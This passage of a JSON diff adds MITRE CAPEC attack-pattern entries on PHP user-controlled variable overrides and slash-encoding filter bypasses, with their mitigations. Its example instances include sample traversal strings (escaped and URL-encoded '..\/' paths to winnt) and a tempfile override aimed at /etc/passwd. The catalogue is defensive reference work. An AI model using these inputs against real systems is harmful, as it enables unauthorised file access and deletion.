"http://cwe.mitre.org/data/definitions/1321.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Artur Maj, Securing PHP: Step-by-Step, 2003--06---22, Security Focus", + "external_id": "REF-520", + "source_name": "reference_from_CAPEC", + "url": "http://www.securityfocus.com/infocus/1706" + }, + { + "description": "Clancy Malcolm, Ten Security Checks for PHP, Part 1, 2003--03---20", + "external_id": "REF-521", + "source_name": "reference_from_CAPEC" + }, + { + "description": "PHP Manual, The PHP Group", + "external_id": "REF-522", + "source_name": "reference_from_CAPEC", + "url": "http://www.php.net/manual/en/security.globals.php" + } + ], + "id": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Manipulating User-Controlled Variables", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n PHP is a study in bad security. The main idea pervading PHP is \"ease of use,\" and the mantra \"don't make the developer go to any extra work to get stuff done\" applies in all cases. 
This is accomplished in PHP by removing formalism from the language, allowing declaration of variables on first use, initializing everything with preset values, and taking every meaningful variable from a transaction and making it available. In cases of collision with something more technical, the simple almost always dominates in PHP.\n One consequence of all this is that PHP allows users of a Web application to override environment variables with user-supplied, untrusted query variables. Thus, critical values such as the CWD and the search path can be overwritten and directly controlled by a remote anonymous user.\n Another similar consequence is that variables can be directly controlled and assigned from the user-controlled values supplied in GET and POST request fields. So seemingly normal code like this, does bizarre things:\n while($count < 10){// Do something$count++;}\n Normally, this loop will execute its body ten times. The first iteration will be an undefined zero, and further trips though the loop will result in an increment of the variable $count. The problem is that the coder does not initialize the variable to zero before entering the loop. This is fine because PHP initializes the variable on declaration. The result is code that seems to function, regardless of badness. The problem is that a user of the Web application can supply a request such as\n GET /login.php?count=9\n and cause $count to start out at the value 9, resulting in only one trip through the loop. Yerg.\n Depending on the configuration, PHP may accept user-supplied variables in place of environment variables. PHP initializes global variables for all process environment variables, such as $PATH and $HOSTNAME. These variables are of critical importance because they may be used in file or network operations. 
If an adversary can supply a new $PATH variable (such as PATH='/var'), the program may be exploitable.\n PHP may also take field tags supplied in GET/POST requests and transform them into global variables. This is the case with the $count variable we explored in our previous example.\n Consider another example of this problem in which a program defines a variable called $tempfile. An adversary can supply a new temp file such as $tempfile = \"/etc/passwd\". Then the temp file may get erased later via a call to unlink($tempfile);. Now the passwd file has been erased--a bad thing indeed on most OSs.\n Also consider that the use of include() and require() first search $PATH, and that using calls to the shell may execute crucial programs such as ls. In this way, ls may be \"Trojaned\" (the adversary can modify $PATH to cause a Trojan copy of ls to be loaded). This type of attack could also apply to loadable libraries if $LD_LIBRARY_PATH is modified.\n Finally, some versions of PHP may pass user data to syslog as a format string, thus exposing the application to a format string buffer overflow.See also: File upload allows arbitrary file read by setting hidden form variables to match internal variable names (CVE-2000-0860)" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probe target application: The adversary first probes the target application to determine important information about the target. This information could include types software used, software versions, what user input the application consumes, and so on.

Experiment

  1. Find user-controlled variables: Using the information found by probing the application, the adversary attempts to manipulate many user-controlled variables and observes the effects on the application. If the adversary notices any significant changes to the application, they will know that a certain variable is useful to the application.

  2. Techniques
    Adversaries will try to alter many common variable names such as \"count\", \"tempFile\", \"i\", etc. The hope is that they can alter the flow of the application without knowing the inner-workings.
    Adversaries will try to alter known environment variables.

Exploit

  1. Manipulate user-controlled variables: Once the adversary has found a user-controller variable(s) that is important to the application, they will manipulate it to change the normal behavior in a way that benefits the adversary.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--f190e1b3-e8d6-4aef-817c-b3e7782e2aed", + "attack-pattern--a506984b-0870-42d9-8bcd-0787f13b8c2e" + ], + "x_capec_prerequisites": [ + "A variable consumed by the application server is exposed to the client.", + "A variable consumed by the application server can be overwritten by the user.", + "The application server trusts user supplied data to compute business logic.", + "The application server does not perform proper input validation." + ], + "x_capec_skills_required": { + "Low": "The malicious user can easily try some well-known global variables and find one which matches.", + "Medium": "The adversary can use automated tools to probe for variables that they can control." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Do not allow override of global variables and do Not Trust Global Variables.\n If the register_globals option is enabled, PHP will create global variables for each GET, POST, and cookie variable included in the HTTP request. This means that a malicious user may be able to set variables unexpectedly. 
For instance make sure that the server setting for PHP does not expose global variables.\n ", + "id": "course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--593062e2-612e-46ce-8739-0d2b1b15f720", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--01f15bc6-e25d-4388-8a84-c6f82d7a7378", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "A software system should be reluctant to trust variables that have been initialized outside of its trust boundary. 
Ensure adequate checking is performed when relying on input from outside a trust boundary.", + "id": "course-of-action--35ecc67f-d191-49d1-b51d-512ab4874d6b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d6ce1ff-fa90-41cf-86a8-911f793e6838", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--35ecc67f-d191-49d1-b51d-512ab4874d6b", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Separate the presentation layer and the business logic layer. Variables at the business logic layer should not be exposed at the presentation layer. 
This is to prevent computation of business logic from user controlled input data.", + "id": "course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3c40eaa0-2cde-4309-b3c3-79aebcc2ada3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fdbec66f-5081-4d39-9732-af19bf458d7d", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use encapsulation when declaring your variables. 
This is to lower the exposure of your variables.", + "id": "course-of-action--9fa19f3a-821e-4faa-b728-a6d30e37b6c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a3e969df-fa7a-479d-ba25-c6b31da5cffa", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9fa19f3a-821e-4faa-b728-a6d30e37b6c2", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. 
Input that does not match against the allowlist should be rejected by the program.", + "id": "course-of-action--3869586b-ef26-4f47-b6bf-e4aee5ac7dea", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-77-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5b6076ab-c2e1-428a-8d0f-b7f0642e9811", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3869586b-ef26-4f47-b6bf-e4aee5ac7dea", + "target_ref": "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the use of the backslash in alternate encoding. An adversary can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. 
By using that trick, the adversary tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.", + "external_references": [ + { + "external_id": "CAPEC-78", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Escaped Slashes in Alternate Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n For example, the byte pair \\0 might result in a single zero byte (a NULL) being sent. Another example is \\t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \\/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:\n / yields /\\/ yields /\n ", + "\n An attack leveraging escaped slashes in slternate encodings is very simple. If you believe the target may be filtering the slash, attempt to supply \\/ and see what happens. Example command strings to try out include\n CWD ..\\/..\\/..\\/..\\/winnt\n which converts in many cases to\n CWD ../../../../winnt\n To probe for this kind of problem, a small C program that uses string output routines can be very useful. 
File system calls make excellent testing fodder. The simple snippet\n int main(int argc, char* argv[]){puts(\"\\/ \\\\ \\? \\. \\| \");return 0;\n }\n produces the output\n / \\ ? . |\n Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:\n CWD ..\\?\\?\\?\\?\\/..\\/..\\/..\\/winntCWD \\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/winntCWD ..\\|\\|\\|\\|\\/..\\/..\\/..\\/winnt\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts to escape multiple different special characters using a backslash.

  2. Techniques
    Escape a special character with a backslash to bypass input validation.
    Try different encodings of both the backslash and the special character to see if this bypasses input validation

Exploit

  1. Manipulate input: Once the adversary determines how to bypass filters that filter out special characters using an escaped slash, they will manipulate the user input in a way that is not intended by the application.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts the backlash character as escape character.", + "The application server does incomplete input data decoding, filtering and validation." + ], + "x_capec_skills_required": { + "Low": "The adversary can naively try backslash character and discover that the target host uses it as escape character.", + "Medium": "The adversary may need deep understanding of the host target in order to exploit the vulnerability. The adversary may also use automated tools to probe for this vulnerability." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify that the user-supplied data does not use backslash character to escape malicious characters.", + "id": "course-of-action--380b117a-6169-466d-a7a6-7d6f047e19a0", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9cb4ae43-cf9a-40ac-a774-6c54684220cf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--380b117a-6169-466d-a7a6-7d6f047e19a0", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--18db8c39-5734-4976-995e-2b41058357e4", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding.", + "id": "course-of-action--5f0544cb-d0a9-41fd-805f-5990ffb5833a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c87e3a8c-ff00-48c7-8fc7-287c0608ac1d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5f0544cb-d0a9-41fd-805f-5990ffb5833a", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Regular expressions can be used to filter out backslash. 
Make sure you decode before filtering and validating the untrusted input data.", + "id": "course-of-action--8535a537-b407-4f8c-939a-b5ac6340509b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--91ab6a50-36a5-4861-85ce-aac5a6c7af09", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8535a537-b407-4f8c-939a-b5ac6340509b", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In the case of path traversals, use the principle of least privilege when determining access rights to file systems. 
Do not allow users to access directories/files that they should not access.", + "id": "course-of-action--c91ecbca-4b35-489b-a4c4-b298fd32b795", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--12c4ce97-d297-42dc-a8bc-b477e5c4bffb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c91ecbca-4b35-489b-a4c4-b298fd32b795", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3f3d2ae6-65d1-4164-a0e0-b2c4925961ba", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Avoid making decisions based on names of resources (e.g. 
files) if those resources can have alternate names.", + "id": "course-of-action--d8d53c86-ce51-4374-9ba7-30c6af721c9b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-78-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--937e412f-6548-4f31-b652-45f3f5510579", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8d53c86-ce51-4374-9ba7-30c6af721c9b", + "target_ref": "attack-pattern--07e5901d-0f6d-41a9-ac19-e00eecece95f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the Slash characters. An adversary would try to exploit common filtering problems related to the use of the slashes characters to gain access to resources on the target host. Directory-driven systems, such as file systems and databases, typically use the slash character to indicate traversal between directories or other container components. For murky historical reasons, PCs (and, as a result, Microsoft OSs) choose to use a backslash, whereas the UNIX world typically makes use of the forward slash. The schizophrenic result is that many MS-based systems are required to understand both forms of the slash. This gives the adversary many opportunities to discover and abuse a number of common filtering problems. 
The goal of this pattern is to discover server software that only applies filters to one version, but not the other.", + "external_references": [ + { + "external_id": "CAPEC-79", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-181", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-185", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/185.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Markus Kuhn, UTF-8 and Unicode FAQ for Unix/Linux, 1999--06---04", + "external_id": "REF-525", + "source_name": "reference_from_CAPEC", + "url": "http://www.cl.cam.ac.uk/~mgk25/unicode.html" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + } + ], + "id": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Slashes in Alternate Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Slashes in Alternate Encodings\n The two following requests are equivalent on most Web servers:\n http://target server/some_directory\\..\\..\\..\\winnt\n is equivalent to\n http://target server/some_directory/../../../winnt\n Multiple encoding conversion problems can also be leveraged as various slashes are instantiated in URL-encoded, UTF-8, or Unicode. 
Consider the strings\n http://target server/some_directory\\..%5C..%5C..\\winnt\n where %5C is equivalent to the \\ character.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and looks for areas where user input is used to access resources on the target host. The adversary attempts different encodings of slash characters to bypass input filters.

  2. Techniques
    Try both backslash and forward slash characters
    Try different encodings for slash characters such as %5C

Exploit

  1. Traverse application directories: Once the adversary determines how to bypass filters that filter out slash characters, they will manipulate the user input to include slashes in order to traverse directories and access resources that are not intended for the user.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application server accepts paths to locate resources.", + "The application server does insufficient input data validation on the resource path requested by the user.", + "The access right to resources are not set properly." + ], + "x_capec_skills_required": { + "Low": "An adversary can try variation of the slashes characters.", + "Medium": "An adversary can use more sophisticated tool or script to scan a website and find a path filtering problem." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. 
Refer to the RFCs to safely decode URL.", + "id": "course-of-action--225305ca-bb17-4652-bce6-a3e088e3e753", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-79-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9a6ee85d-1fc3-4c89-a197-b17473b215bb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--225305ca-bb17-4652-bce6-a3e088e3e753", + "target_ref": "attack-pattern--eba7bbc3-fb5e-46c4-8547-742d1d144fb3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04f00f04-9695-4b7c-9593-29b78e51dda7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": 